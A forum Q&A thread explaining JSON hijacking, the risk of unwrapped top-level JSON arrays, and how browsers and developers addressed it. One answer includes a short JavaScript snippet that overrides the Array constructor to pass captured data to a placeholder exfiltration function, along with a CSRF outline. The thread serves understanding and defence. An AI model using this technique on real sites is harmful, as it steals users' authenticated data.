What are "top level JSON arrays" and why are they a security risk?

Question

In the video below, at time marker 21:40, the Microsoft PDC presenter says it's important that all JSON be wrapped so it's not a top level array:

https://channel9.msdn.com/Events/PDC/PDC09/FT12

What is the risk of an unwrapped top level array?

How should I check and see if I'm vulnerable? I purchase many components from 3rd parties and have external vendors who develop my code.

Answer 1

This is because a few years ago Jeremiah Grossman found a very interesting vulnerability that affects gmail. Some people have addressed this vulnerabilty by using an unparseable cruft (Mr bobince's technical description on this page is fantastic.)

The reason why Microsoft is talking about this is because they haven't patched their browser (yet). (Edit: Recent versions of Edge and IE 10/11 have addressed this issue.) Mozilla considers this to be a vulnerability in the json specification and therefore they patched it in Firefox 3. For the record I completely agree with Mozilla, and its unfortunate but each web app developer is going to have to defend them selves against this very obscure vulnerability.

Answer 2

I think it's because the Array() constructor can be redefined. However, that problem isn't really unique to arrays.

I think the attack (or one possible way) is something like this:

function Array(n) {
  var self = this;
  setTimeout(function() {
    sendToEvilHackers(self);
  }, 10);
  return this;
}

The browser (or some browsers) use that constructor for [n, n, n] array notation. A CSRF attack can therefore exploit your open session with your bank, hit a known JSON URL with a <script> tag to fetch it, and then poof you are owned.